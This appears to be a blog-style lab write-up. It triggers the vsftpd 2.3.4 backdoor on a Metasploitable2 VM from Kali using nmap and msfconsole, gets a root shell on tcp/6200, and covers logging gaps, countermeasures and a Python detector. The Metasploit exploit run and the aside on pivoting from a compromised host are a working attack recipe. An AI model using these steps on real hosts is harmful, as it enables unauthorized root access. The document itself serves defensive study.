■Triggering the vsftpd 2.3.4 backdoor (CVE-2011-2523) from msfconsole.
The point of this exercise is to work out countermeasures; do not run it against any host you are not authorized to test.
Boot Kali Linux 2018.2 and Metasploitable2-Linux on KVM.
http://labunix.hateblo.jp/?page=1525496768
■Reassign the MAC address of Metasploitable2-Linux.
Just shut the VM down, delete the <mac address='...'/> element from the domain XML so that libvirt generates a fresh one, and start it again.
$ virsh edit Metasploitable2-Linux
■Isolate the lab on br1 only. The script below detaches kvm-stretch's br1 interface and kali2018-2's br0 interface: for each "domain;bridge-number" pair it reads the MAC that virsh domiflist reports for that bridge and feeds it to virsh detach-interface, so afterwards only kali2018-2 and Metasploitable2-Linux remain on br1 and nothing on br1 has a path out.
$ cat ./myscripts/proxy_off.sh
echo -e "kvm-stretch;1\nkali2018-2;0" | \
awk -F';' '{print "virsh domiflist "$1" | awk \047/br"$2"/{print $NF}\047 | \
virsh detach-interface --domain "$1" --type bridge --mac `xargs`"}' | sudo sh
$ ./myscripts/proxy_off.sh
Interface detached successfully
Interface detached successfully
$ echo -e "kvm-stretch\nkali2018-2\nMetasploitable2-Linux" | \
awk '{print "echo ["$1"];virsh domiflist "$1}' | sh | sed -e 's/\(52:54:00:\)..:../\1XX:XX/'
[kvm-stretch]
Interface Type Source Model MAC
-------------------------------------------------------
vnet0 bridge br0 virtio 52:54:00:XX:XX:1f
[kali2018-2]
Interface Type Source Model MAC
-------------------------------------------------------
vnet3 bridge br1 virtio 52:54:00:XX:XX:f4
[Metasploitable2-Linux]
Interface Type Source Model MAC
-------------------------------------------------------
vnet1 bridge br1 rtl8139 52:54:00:XX:XX:32
■This leaves the following network layout.
$ echo "[KVM(hostonly-br1)] <--> [Red Team(kali-2018.2)],[Blue Team(metasploitable-linux-2.0.0)]" | graph-easy
+-----------------------+ +---------------------------------------+
| KVM(hostonly-br1) | <--> | Blue Team(metasploitable-linux-2.0.0) |
+-----------------------+ +---------------------------------------+
^
|
|
v
+-----------------------+
| Red Team(kali-2018.2) |
+-----------------------+
■Port scan of Metasploitable2-Linux from kali2018-2 (run as nmap -sV -O -T4 192.168.0.2, as noted further below; version and OS detection output follows).
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-05 22:22 JST
Nmap scan report for 192.168.0.2
Host is up (0.0011s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open shell Netkit rshd
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 52:54:00:9F:16:32 (QEMU virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.66 seconds
■Start msfconsole on kali2018-2 as the Red Team.
It takes a while to come up.
$ msfconsole
=[ metasploit v4.16.54-dev ]
+ -- --=[ 1757 exploits - 1006 auxiliary - 306 post ]
+ -- --=[ 536 payloads - 41 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf>
■Check the PostgreSQL-backed module cache that search relies on. The first search warns that the cache is not built yet and falls back to the slow path; db_rebuild_cache fixes that in the background.
msf > db_status
[*] postgresql connected to msf
msf > search CVE-2014-0160
[!] Module database cache not built yet, using slow search
msf > db_rebuild_cache
[*] Purging and rebuilding the module cache in the background...
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/ssl/openssl_heartbleed 2014-04-07 normal OpenSSL Heartbeat (Heartbleed) Information Leak
auxiliary/server/openssl_heartbeat_client_memory 2014-04-07 normal OpenSSL Heartbeat (Heartbleed) Client Memory Exposure
■How to connect kali2018-2 to the outside temporarily, update it, and detach again. Re-attach the br0 interface, update over it, then remove it so the lab goes back to br1 only.
$ virsh attach-interface --type bridge --source br0 --model virtio kali2018-2
Interface attached successfully
$ ssh kali2018-2
$ su
# ifdown eth0 ;ifup eth
# dpkg -L metasploit-framework | grep msfupdate
/usr/share/metasploit-framework/msfupdate
# /usr/share/metasploit-framework/msfupdate
msfupdate is no longer supported when Metasploit is part of the operating
system. Please use 'apt update; apt install metasploit-framework'
# apt update; apt install metasploit-framework
# exit
$ exit
$ echo -e "kali2018-2;0" | \
awk -F';' '{print "virsh domiflist "$1" | awk \047/br"$2"/{print $NF}\047 | \
virsh detach-interface --domain "$1" --type bridge --mac `xargs`"}' | sudo sh
Interface detached successfully
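The isolation and re-attach steps above both rely on the same awk one-liner to pull the MAC of the interface on a given bridge out of virsh domiflist. As an added example (not the post's script), the helper below does the same in Python: it parses the domiflist listing, builds the exact virsh detach-interface commands, and reports which bridges a domain is still on so the isolation can be verified. The domiflist text embedded below is constructed in the layout the post shows, with made-up MACs; the isolate() function assumes a working virsh on the host and defaults to a dry run.

```python
"""Helper for the lab-isolation step: read `virsh domiflist <domain>` output,
select the interfaces on a given bridge, and build the matching
`virsh detach-interface` commands.  Added example, not the post's script;
SAMPLE_DOMIFLIST is constructed (MACs made up) in the layout the post shows."""
import re
import subprocess

SAMPLE_DOMIFLIST = """\
Interface  Type    Source  Model   MAC
-------------------------------------------------------
vnet0      bridge  br0     virtio  52:54:00:11:22:1f
vnet3      bridge  br1     virtio  52:54:00:11:22:f4
"""

MAC_RE = re.compile(r"^(?:[0-9a-f]{2}:){5}[0-9a-f]{2}$", re.I)


def parse_domiflist(text):
    """Return one dict per interface row; header and ruler lines are skipped."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) == 5 and MAC_RE.match(fields[4]):
            rows.append(dict(zip(("iface", "type", "source", "model", "mac"), fields)))
    return rows


def detach_commands(domain, text, bridge):
    """Commands that detach every interface of `domain` attached to `bridge`.

    The bridge name is compared exactly: the post's awk pattern /br1/ is a
    substring match and would also hit an interface on, say, br10."""
    return [
        ["virsh", "detach-interface", "--domain", domain, "--type", "bridge",
         "--mac", row["mac"]]
        for row in parse_domiflist(text)
        if row["type"] == "bridge" and row["source"] == bridge
    ]


def remaining_bridges(text):
    """Bridges the domain is still attached to; use it to verify isolation."""
    return sorted({r["source"] for r in parse_domiflist(text) if r["type"] == "bridge"})


def isolate(domain, keep_bridge, dry_run=True):
    """Detach every bridge interface except `keep_bridge` from a running domain.

    Calls virsh through subprocess; with dry_run=True it only prints the
    commands it would run."""
    listing = subprocess.run(["virsh", "domiflist", domain], check=True,
                             capture_output=True, text=True).stdout
    cmds = [c for b in remaining_bridges(listing) if b != keep_bridge
            for c in detach_commands(domain, listing, b)]
    for cmd in cmds:
        if dry_run:
            print(" ".join(cmd))
        else:
            subprocess.run(cmd, check=True)
    return cmds


if __name__ == "__main__":
    # Offline demonstration on the constructed listing: drop br0 from kali.
    for cmd in detach_commands("kali2018-2", SAMPLE_DOMIFLIST, "br0"):
        print(" ".join(cmd))
    print("still attached to:", remaining_bridges(SAMPLE_DOMIFLIST))
```

After isolate("kali2018-2", "br1", dry_run=False), a second virsh domiflist run through remaining_bridges() should return ["br1"] only; that is the same check the post makes by hand with the domiflist listing.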
■Confirm that a recent CVE can now be found by search.
msf > search CVE-2018-7600
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Drupal Drupalgeddon 2 Forms API Property Injection
msf > search Drupal
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Drupal OpenID External Entity Injection
auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Drupal Views Module Users Enumeration
exploit/multi/http/drupal_drupageddon 2014-10-15 excellent Drupal HTTP Parameter Key/Value SQL Injection
exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Drupal CODER Module Remote Command Execution
exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Drupal Drupalgeddon 2 Forms API Property Injection
exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Drupal RESTWS Module Remote PHP Code Execution
exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent PHP XML-RPC Arbitrary Code Execution
■Suppose the attacker has learned that vsftpd 2.3.4 is running.
(The version was already in the output of "nmap -sV -O -T4 [target-ip]" above.)
Countermeasures include applying the security patch (upgrading to the current version),
closing TCP/21 at the firewall, hiding the vsftpd version banner, and placing the host behind an IDS/IPS.
Hiding the version only buys obscurity, though: a vulnerability check script still confirms the backdoor by exercising it,
so at best it gets the host dropped from the attacker's list during the reconnaissance stage.
For comparison, the version currently packaged on the Kali side:
$ apt-cache show vsftpd | awk '/Version/'
Version: 3.0.3-8+b1
$ nmap -A -p 21 192.168.0.2
Starting Nmap 7.40 ( https://nmap.org ) at 2018-05-05 21:51 JST
Nmap scan report for 192.168.0.2
Host is up (0.0018s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.14 seconds
■Nmap ships a check script for this backdoor, and it reported the host as vulnerable. Note that the script is not a banner check: it triggers the backdoor and runs "id" over it (see "Exploit results" below), so it is as intrusive as the exploit itself and should only be pointed at hosts you are allowed to exploit.
File ftp-vsftpd-backdoor
https://nmap.org/nsedoc/scripts/ftp-vsftpd-backdoor.html
$ nmap --script ftp-vsftpd-backdoor -p 21 192.168.0.2
Starting Nmap 7.40 ( https://nmap.org ) at 2018-05-05 21:46 JST
Nmap scan report for 192.168.0.2
Host is up (0.0061s latency).
PORT STATE SERVICE
21/tcp open ftp
| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
| State: VULNERABLE (Exploitable)
| IDs: OSVDB:73573 CVE:CVE-2011-2523
| vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
| Disclosure date: 2011-07-03
| Exploit results:
| Shell command: id
| Results: uid=0(root) gid=0(root)
| References:
| https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
| http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
|_ http://osvdb.org/73573
Nmap done: 1 IP address (1 host up) scanned in 1.35 seconds
■Searching by the CVE ID returns nothing (the module is not tagged with that CVE in this Metasploit version), but searching by product name finds the vsftpd exploit.
msf > search CVE-2011-2523
msf > search type:exploit vsftpd
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
■Connecting to the shell through the backdoor on tcp/6200 gives root on the target.
If the box can reach the outside, an Ubuntu host like this can be turned into an attack server with "apt-get install metasploit-framework",
and since nmap runs as root there, "ip neigh" and "ip route" expose the surrounding L2/L3 information for further reconnaissance.
As a stopgap the backdoor port could be blocked at the firewall, but that only cuts off the connection to 6200; the trigger on port 21 still works and the backdoor still gets spawned.
Upgrading vsftpd is the real fix.
msf exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.0.2:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.0.2:21 - USER: 331 Please specify the password.
[+] 192.168.0.2:21 - Backdoor service has been spawned, handling...
[+] 192.168.0.2:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 4 opened (192.168.0.3:43633 -> 192.168.0.2:6200) at 2018-05-05 22:07:57 +0900
id
uid=0(root) gid=0(root)
whoami
root
lsb_release -d
Description: Ubuntu 8.04
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
nmap -V
Nmap version 4.53 ( http://insecure.org )
Abort session 4? [y/N] y
[*] 192.168.0.2 - Command shell session 4 closed. Reason: User exit
■On the Metasploitable2-Linux side nothing shows up in /var/log/auth.log or the other logs. vsftpd.log records only the CONNECT: the backdoor fires during the USER/PASS exchange, before the session reaches a login result, so no "OK LOGIN" or "FAIL LOGIN" line is ever written.
$ sudo tail -f /var/log/*.log
==> /var/log/vsftpd.log <==
Sat May 5 09:17:19 2018 [pid 4942] CONNECT: Client "192.168.0.3"
■By contrast, a normal login with an ftp client or with FTP commands typed over telnet
leaves a login entry on the Metasploitable2-Linux side.
# kali2018-2
$ telnet 192.168.0.2 21
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user msfadmin
331 Please specify the password.
pass msfadmin
230 Login successful.
quit
221 Goodbye.
Connection closed by foreign host.
# MetaSploitable2-Linux
$ sudo tail -f /var/log/*.log
==> /var/log/vsftpd.log <==
Sat May 5 09:18:43 2018 [pid 4951] CONNECT: Client "192.168.0.3"
Sat May 5 09:18:51 2018 [pid 4950] [msfadmin] OK LOGIN: Client "192.168.0.3"
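The two log excerpts above give the Blue Team a detection signal: a legitimate session logs CONNECT followed by OK LOGIN or FAIL LOGIN from the same client, while the backdoor trigger leaves a CONNECT that never reaches a login result. As an added example (not code from the post), the script below scans vsftpd.log text for such silent CONNECTs and checks a listening-socket listing for the tcp/6200 backdoor port. The log lines and the netstat-style output embedded below are constructed samples in the formats the post shows; the 30-second window is an assumed threshold. Note that vsftpd logs CONNECT and LOGIN from different pids (4951 vs 4950 in the excerpt), so the correlation is done by client address, not pid.

```python
"""Flag vsftpd sessions that never reach a login result (CONNECT with no
OK/FAIL LOGIN from the same client within a window) and look for a listener
on the tcp/6200 backdoor port.  Added example, not from the post; the log
and socket lines below are constructed samples in the formats the post shows."""
import re
from datetime import datetime, timedelta

SAMPLE_LOG = """\
Sat May  5 09:17:19 2018 [pid 4942] CONNECT: Client "192.168.0.3"
Sat May  5 09:18:43 2018 [pid 4951] CONNECT: Client "192.168.0.3"
Sat May  5 09:18:51 2018 [pid 4950] [msfadmin] OK LOGIN: Client "192.168.0.3"
Sat May  5 09:20:02 2018 [pid 4960] CONNECT: Client "192.168.0.7"
Sat May  5 09:20:05 2018 [pid 4959] [anonymous] FAIL LOGIN: Client "192.168.0.7"
Sat May  5 09:21:30 2018 [pid 4970] CONNECT: Client "192.168.0.9"
"""

# Constructed `netstat -ltn` style output with the backdoor listener present.
SAMPLE_SOCKETS = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:6200            0.0.0.0:*               LISTEN
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) '
    r'\[pid (?P<pid>\d+)\] (?:\[(?P<user>[^\]]*)\] )?'
    r'(?P<event>[A-Z ]+?): Client "(?P<client>[^"]+)"'
)
BACKDOOR_PORT = 6200


def parse_line(line):
    """Parse one vsftpd.log line; returns None for lines in another format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # vsftpd pads single-digit days with a second space; collapse it for strptime
    ts = datetime.strptime(" ".join(m["ts"].split()), "%a %b %d %H:%M:%S %Y")
    return {"ts": ts, "pid": int(m["pid"]), "user": m["user"],
            "event": m["event"], "client": m["client"]}


def find_silent_connects(log_text, window=timedelta(seconds=30)):
    """Return (silent, fresh): CONNECT records that got no OK/FAIL LOGIN from
    the same client within `window`, and CONNECTs still younger than the
    window at the end of the log (undecided, not alerted)."""
    pending = {}          # client -> [CONNECT records awaiting a login result]
    silent = []
    last_ts = None

    def expire(now):
        for client, queue in pending.items():
            keep = []
            for rec in queue:
                (silent if now - rec["ts"] > window else keep).append(rec)
            pending[client] = keep

    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        last_ts = rec["ts"]
        expire(last_ts)
        if rec["event"] == "CONNECT":
            pending.setdefault(rec["client"], []).append(rec)
        elif rec["event"] in ("OK LOGIN", "FAIL LOGIN"):
            queue = pending.get(rec["client"], [])
            if queue:
                queue.pop(0)      # oldest unexpired CONNECT from this client
    if last_ts is not None:
        expire(last_ts)
    fresh = [rec for queue in pending.values() for rec in queue]
    return silent, fresh


def backdoor_listener(socket_text, port=BACKDOOR_PORT):
    """True if a LISTEN line of netstat/ss -ltn output has local port `port`."""
    for line in socket_text.splitlines():
        fields = line.split()
        if "LISTEN" in fields and any(re.search(rf":{port}$", f) for f in fields[:5]):
            return True
    return False


if __name__ == "__main__":
    silent, fresh = find_silent_connects(SAMPLE_LOG)
    for rec in silent:
        print(f"{rec['ts']} pid {rec['pid']} client {rec['client']}: "
              "CONNECT with no login result")
    print("unresolved but still fresh:", [r["pid"] for r in fresh])
    print("tcp/6200 listener present:", backdoor_listener(SAMPLE_SOCKETS))
```

On the sample the only silent CONNECT is pid 4942 from 192.168.0.3, which matches the exploit run in the post; the 09:21:30 CONNECT is reported as fresh rather than alerted because the log ends inside the window. A silent CONNECT on its own is weak evidence (clients do connect and hang up), so treat it as a cue to check for the 6200 listener and the vsftpd version, and, as the post says, upgrade rather than rely on blocking the port.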